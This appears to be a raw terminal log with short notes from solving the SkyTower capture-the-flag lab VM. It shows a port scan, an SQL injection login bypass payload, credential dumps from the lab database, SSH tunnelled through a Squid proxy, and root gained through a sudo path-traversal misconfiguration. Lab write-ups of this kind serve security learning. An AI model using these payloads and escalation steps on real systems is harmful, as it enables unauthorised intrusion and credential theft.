
22/tcp   filtered ssh
80/tcp   open     http       Apache httpd 2.2.22 ((Debian))
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Site doesn't have a title (text/html).
3128/tcp open     http-proxy Squid http proxy 3.1.20
|_http-server-header: squid/3.1.20
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 08:00:27:54:4A:37 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

http://192.168.56.101/login.php
    email='|| 1<2 # &password=eqw

    Welcome john@skytech.com
    Username: john
    Password: hereisjohn



─$ sudo proxytunnel -a 8829 -p 192.168.56.101:3128  -d 192.168.56.101:22


    └─$ sudo ssh john@127.0.0.1 -p 8829        
[sudo] password for ed: 
Sorry, try again.
[sudo] password for ed: 
The authenticity of host '[127.0.0.1]:8829 ([127.0.0.1]:8829)' can't be established.
ECDSA key fingerprint is SHA256:QYZqyNNW/Z81N86urjCUIrTBvJ06U9XDDzNv91DYaGc.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[127.0.0.1]:8829' (ECDSA) to the list of known hosts.
john@127.0.0.1's password: 
Linux SkyTower 3.2.0-4-amd64 #1 SMP Debian 3.2.54-2 x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Thu Jun  5 23:29:08 2025 from 192.168.56.101

Funds have been withdrawn
Connection to 127.0.0.1 closed.
                                                                                                    
┌──(ed㉿kali)-[~]
└─$ sudo ssh john@127.0.0.1 -p 8829 /bin/bash
john@127.0.0.1's password: 
hereisjohn
/bin/bash: line 1: hereisjohn: command not found
id
uid=1000(john) gid=1000(john) groups=1000(john)

john@127.0.0.1's password: 
/home/john/.bashrc: line 1: mples: command not found
ls
id
uid=1000(john) gid=1000(john) groups=1000(john)
ls -la
total 24
drwx------ 2 john john 4096 Jun  6 01:19 .
drwxr-xr-x 5 root root 4096 Jun 20  2014 ..
-rw------- 1 john john    7 Jun 20  2014 .bash_history
-rw-r--r-- 1 john john  220 Jun 20  2014 .bash_logout
-rw-r--r-- 1 john john 3293 Jun  6 01:19 .bashrc
-rw-r--r-- 1 john john  675 Jun 20  2014 .profile
//rm .bashrc then get a normall shell

└─$ sudo ssh john@127.0.0.1 -p 8829 /bin/sh
john:x:1000:1000:john,,,:/home/john:/bin/bash
sara:x:1001:1001:,,,:/home/sara:/bin/bash
william:x:1002:1002:,,,:/home/william:/bin/bash

cat login.php
<?php

$db = new mysqli('localhost', 'root', 'root', 'SkyTech');

if($db->connect_errno > 0){


mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| SkyTech            |
| mysql              |
| performance_schema |
+--------------------+
4 rows in set (0.00 sec)

mysql> use SkyTech
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A

Database changed
mysql> show tables;
+-------------------+
| Tables_in_SkyTech |
+-------------------+
| login             |
+-------------------+
1 row in set (0.00 sec)

mysql> select * from login;
+----+---------------------+--------------+
| id | email               | password     |
+----+---------------------+--------------+
|  1 | john@skytech.com    | hereisjohn   |
|  2 | sara@skytech.com    | ihatethisjob |
|  3 | william@skytech.com | senseable    |
+----+---------------------+--------------+
3 rows in set (0.00 sec)

//the same ssh sara and rm .bashrc. ssh aga

sara@SkyTower:~$ sudo -l
Matching Defaults entries for sara on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User sara may run the following commands on this host:
    (root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*

    sara@SkyTower:/$ sudo ls /accounts/../root/
flag.txt
sara@SkyTower:/$ sudo cat /accounts/../root/flag.txt
Congratz, have a cold one to celebrate!
root password is theskytower
sara@SkyTower:/$ su root
Password: 
root@SkyTower:/# id
uid=0(root) gid=0(root) groups=0(root)
